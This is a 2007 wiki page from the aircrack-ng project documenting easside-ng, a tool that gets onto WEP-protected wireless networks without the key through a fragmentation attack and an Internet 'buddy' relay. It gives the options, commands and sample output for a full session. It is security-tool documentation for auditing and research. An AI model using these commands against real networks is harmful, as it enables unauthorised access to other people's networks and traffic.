User Tools

Site Tools


easside-ng

This is an old revision of the document!


Easside-ng

++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++

This functionality will be available in a future release. It is NOT available currently.

++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++
++++++ IMPORTANT ++++++

Description

Easside-ng is an auto-magic tool which allows you to communicate via an access point (AP) without knowing the WEP key. It first identifies a network, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme and then setup a TAP interface so that you can communicate with the AP. All this is done without your intervention.

There are two primary papers “The Fragmentation Attack in Practice” by Andrea Bittau and “The Final Nail in WEP's Coffin” by Andrea Bittau, Mark Handley and Josua Lockey which are of interest. See the the links page for these papers and more. The papers referenced provide excellent background information if you would like to understand the underlying methodologies. The concepts for the fragment attack currently incorporated in aircrack-ng came from these papers.

In order to access the wireless network without knowing the WEP key is done by having the AP iteself decrypt the packets. This is achieved having a “buddy” process running on a server accessable on the Internet. This “buddy” server echoes back the received decrypted packets to the system running easside-ng. This imposes a number of critical requirements for easside-ng to work:

  • The access point must be able to communicate with the Internet
  • A “buddy” server must exist on the Internet without firewalling
  • The system running easside-ng must have access to the Internet and be able to communicate with the “buddy” server
  • The system running easside-ng must have a wireless card

Here are the steps which essside-ng takes:

  1. Channel hops looking for a WEP network.
  2. Once a network is found, it tries to authenticate.
  3. Once the program has successfully authenticated then it associates with the AP.
  4. After sniffing a single data packet, it proceeds to discover at least 1504 bytes of PRGA by sending out larger broadcasts and intercepting the relayed packets. This is what is known as the fragmentation attack. The PRGA is written to the prga.log file.
  5. It then decrypts the IP network by guessing the next three bytes of PRGA using multicast frames and the linear keystream expansion technique. By decrypting the ARP request, the network number scheme can be determined. This is used to build the ARP request which is used for subsequent injection.
  6. It creates a permanent TCP connection with the “buddy” server and verifies connectivity.
  7. It then tests connectivity via the access point and determines the Internet IP address that the AP uses. It also lists the round trip time of the test packets. This gives you an idea of the quality of connection.
  8. The TAP interface is then created.

At this point, you run “ifconfig at0 up” and you are now able to communicate with any host on the AP network via this TAP interface. Notice that you don't need the WEP key to do this!

So you may be asking “What is the magic? How can you access the AP without knowing the WEP key?”. The method is quite simple yet ingenious. To send packets, most APs have the bad habit of accepting packets with the same initialization vector over and over again. Thus the PRGA is used to encrypt packets being sent to hosts on the AP network. To receive packets, the “buddy” server is leveraged. When encrypted packets are received, headers are added to them and the extended packet is sent (using UDP packets) to the “buddy” server via the AP. The AP decrypts this extended packet and forwards it the “buddy” server on the Internet. In turn, the “buddy” server sends the decrypted packet back directly to easside-ng via the “easside-ng - buddy” connection.

So you may also be asking “What is the linear keystream expansion technique?”. The foundation is the fact that packets like an encrypted ARP request can easily be identified combined with the fact that the start of it has known plain text. So the program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one more byte then the know PRGA and the PRGA is guessed for the extra byte. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.

There are a few known limitations:

  • Only open authentication is support. Shared key authentication is not supported.
  • Only B and G networks are supported.

Usage

Usage: easside-ng <arg> [v0]

Where:

  • -h Displays the list of options.
  • -v MAC address of the Acess Point (Optional)
  • -m Source MAC address to be used (Optional)
  • -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus “.123” (Optional)
  • -r IP address of the AP router. This could be the WAN IP of the AP or an actual router IP depending on the topology. Defaults to the decoded network plus “.1”. (Optional)
  • -s IP address of the “buddy” server (Mandatory)
  • -f Wireless interface name. (Mandatory)
  • -c Locks the card to the specified channel (Optional)
  • [v0] Current version number. Informational only.

Usage: buddy-ng

NOTE: There are no parameters for buddy-ng. Once invoked, it listens on TCP port 6969 and UDP port 6969. TCP is used for the permanent connection between esside-ng and buddy-ng. UDP is used to receive decrypted packets from the AP.

When you run easside-ng, it creates a file automatically in the current directory when run the program:

  • prga.log - Contains the PRGA obtained through the fragmentation attack. The following is NOT correct. It is a future feature: “This can be used as input to other aircrack-ng suite tools which require PRGA as input. You can also use the PRGA from other tools for this file.”

It is very important to delete this file prior to starting the program when you change target access point.

Scenarios

Standard Usage Example

Be sure to use airmon-ng to put your card into monitor mode.

First, you need to start a buddy server. This needs to be located on the Internet and be accessable from the system running easside-ng via TCP. It must also be accessable from the AP via UDP. Port 6969 cannot be firewalled on it.

You start the buddy sever:

 buddy-ng

It responds:

 buddy-ng
 Waiting for connexion

When easside-ng connects, it responds similar to:

 Got connection from 10.113.65.187
 Handshake complete
 Inet check by 10.113.65.187 1

The IP 10.113.65.187 above is the IP of the system running easside-ng.

Now run easside-ng:

 easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9  -s 10.116.23.144

Where:

  • -f ath0 This is the wireless interface name.
  • -v 00:14:6C:7E:40:80 The is the MAC address of the AP.
  • -c 9 This is the channel the AP is on.
  • -s 10.116.23.144 This is the buddy server IP.

The system responds:

 Setting tap MTU
 Sorting out wifi MAC
 MAC is 00:08:D4:86:7E:98
 Setting tap MAC
 [14:40:06.596419] Ownin...
 SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
 Sending auth request
 Authenticated
 Sending assoc request
 Associated: 1
 Assuming ARP 54
 [14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
 [14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
 [14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
 [14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
 [14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
 [14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
 Assuming ARP 36
 [15:23:42.047332] Guessing prga byte 22 with 16
 ARP IP so far: 192
 [15:23:42.749330] Guessing prga byte 23 with 3F
 ARP IP so far: 192.168
 [15:23:43.815329] Guessing prga byte 24 with 60
 ARP IP so far: 192.168.1
 My IP 192.168.1.123
 Rtr IP 192.168.1.1
 Sending who has 192.168.1.1 tell 192.168.1.123
 Rtr MAC 00:14:6C:7E:40:80
 Trying to connect to buddy: 10.116.23.144:6969
 Connected
 Handshake compl33t
 Checking for internet... 1
 Internet w0rx.  Public IP 10.113.65.187
 Rtt 77ms

At this point, you need to bring up the TAP interface:

 ifconfig at0 up

Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/24 via the at0 inteface.

Usage Tips

The above example is for a specific Access Point on a specific channel. You can also let easside-ng scan for the AP by using “easside-ng -f ath0 -s 10.116.23.144”.

Usage Troubleshooting

Make sure your card is in monitor mode.

Make sure your card can inject by testing it with the aireplay-ng injection test. Also specifically ensure you can communicate with the AP in question.

Make sure your card supports the fragmentation attack. Again, this can be confirmed with the aireplay-ng injection test.

Make sure to delete prga.log if you are changing access points or if you want to restart cleanly. In general, if you have problems, it is a good idea to delete it.

There are a few known limitations:

  • Only open authentication is support. Shared key authentication is not supported.
  • Only B and G networks are supported.
easside-ng.1184878159.txt.gz · Last modified: 2007/07/19 22:49 by darkaudax